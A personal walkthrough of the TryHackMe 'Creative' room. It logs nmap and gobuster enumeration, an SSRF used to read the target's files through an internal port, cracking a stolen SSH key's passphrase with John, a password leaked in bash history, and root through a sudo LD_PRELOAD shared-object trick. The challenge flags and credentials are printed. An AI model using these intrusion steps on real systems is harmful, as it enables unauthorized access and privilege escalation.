Creative -- Tryhackme -- 20 Nov 2024 -- 1hr 20min
https://tryhackme.com/r/room/creative

---- Enumeration

-- Nmap Scan
┌──(kali㉿kali)-[~]
└─$ nmap -sV -sC 10.10.22.213 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 23:04 EST
Nmap scan report for 10.10.22.213
Host is up (0.18s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 a0:5c:1c:4e:b4:86:cf:58:9f:22:f9:7c:54:3d:7e:7b (RSA)
|   256 47:d5:bb:58:b6:c5:cc:e3:6c:0b:00:bd:95:d2:a0:fb (ECDSA)
|_  256 cb:7c:ad:31:41:bb:98:af:cf:eb:e4:88:7f:12:5e:89 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://creative.thm
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.84 seconds

Result - 22 and 80

---- Website - 80
Check website found a comment functionality Try XSS Not work
Inspect Source Code -- Nothing 

See subdomain then find subdomain with gobuster
Tried FFUF also with some wordlist but it not find while gobuster find

Teach of day - Not rely on only one tool always

-- Gobuster Scan
┌──(kali㉿kali)-[~]
└─$ gobuster vhost -u http://creative.thm/ -w /usr/share/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain -t 40
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://creative.thm/
[+] Method:          GET
[+] Threads:         40
[+] Wordlist:        /usr/share/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.6
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: beta.creative.thm Status: 200 [Size: 591]
Progress: 100000 / 100001 (100.00%)
===============================================================
Finished
===============================================================

beta.creative.thm

Here on Website test url function means it curl I tried to curl reverse shell but it not trigger -- It show its code

------ Mistake-1 : I get frustated and see walkthrough after 10 min of trying

Its a vulnerability I never found something like this When i tried curl localhost it show website code - Nothing
Then tried in all ports like some other website may be run on localhost any other

Use Intruder found - 1337 port here I found full file system of target

Discover User Saad and copy its ssh key

-- Break its passphrase

┌──(kali㉿kali)-[~]
└─$ nano id_rsa 
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ chmod 600 id_rsa 
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa saad@creative.thm 
Enter passphrase for key 'id_rsa': 

                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ ssh2john id_rsa > forjohn
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt forjohn 
Created directory: /home/kali/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
sweetness        (id_rsa)     
1g 0:00:00:19 DONE (2024-11-19 23:46) 0.05094g/s 48.90p/s 48.90c/s 48.90C/s wesley..sandy
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ ssh -i id_rsa saad@creative.thm                         
Enter passphrase for key 'id_rsa': 
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 20 Nov 2024 04:46:56 AM UTC

  System load:  0.0               Processes:             116
  Usage of /:   57.4% of 8.02GB   Users logged in:       0
  Memory usage: 27%               IPv4 address for eth0: 10.10.22.213
  Swap usage:   0%

 * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
   just raised the bar for easy, resilient and secure K8s cluster deployment.

   https://ubuntu.com/engage/secure-kubernetes-at-the-edge

58 updates can be applied immediately.
33 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Nov  6 07:56:40 2023 from 192.168.8.102
saad@m4lware:~$ ls
snap  start_server.py  user.txt
saad@m4lware:~$ cat user.txt 
9a1ce90a7653d74ab98630b47b8b4a84

Found user txt 

----- Privilege Escalation

see .bash_history file on home found user password

saad@m4lware:~$ cat .bash_history
whoami
pwd
ls -al
ls
cd ..
sudo -l
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
sudo -l
whomai
whoami
pwd
ls -al
sudo -l
ls -al
pwd
whoami
mysql -u root -p
netstat -antlp
mysql -u root
sudo su
ssh root@192.169.155.104
mysql -u user -p
mysql -u db_user -p
ls -ld /var/lib/mysql
ls -al
cat .bash_history 
cat .bash_logout 
nano .bashrc 
ls -al
saad@m4lware:~$ sudo -l
[sudo] password for saad: 
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User saad may run the following commands on m4lware:
    (root) /usr/bin/ping

Interesting - LD_PRELOAD

Use this privilge to root

saad@m4lware:~$ cd /tmp
saad@m4lware:/tmp$ nano shell.c
saad@m4lware:/tmp$ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
shell.c: In function ‘_init’:
shell.c:6:1: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    6 | setgid(0);
      | ^~~~~~
shell.c:7:1: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    7 | setuid(0);
      | ^~~~~~
saad@m4lware:/tmp$ ls -al shell.so
-rwxrwxr-x 1 saad saad 14760 Nov 20 04:56 shell.so
saad@m4lware:/tmp$ sudo LD_PRELOAD=/tmp/shell.so find
Sorry, user saad is not allowed to execute '/usr/bin/find' as root on m4lware.
saad@m4lware:/tmp$ sudo LD_PRELOAD=/tmp/shell.so ping
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# ls
linpeas.sh
shell.c
shell.so
snap-private-tmp
systemd-private-578c48bdaea946f8a9b8bed13d05f8f5-ModemManager.service-BIgajj
systemd-private-578c48bdaea946f8a9b8bed13d05f8f5-systemd-logind.service-RlssYg
systemd-private-578c48bdaea946f8a9b8bed13d05f8f5-systemd-resolved.service-criGlf
systemd-private-578c48bdaea946f8a9b8bed13d05f8f5-systemd-timesyncd.service-3VGiQi
tmux-1000
# cd /root
# ls
root.txt  snap
# cat root.txt
992bfd94b90da48634aed182aae7b99f

Found root.txt
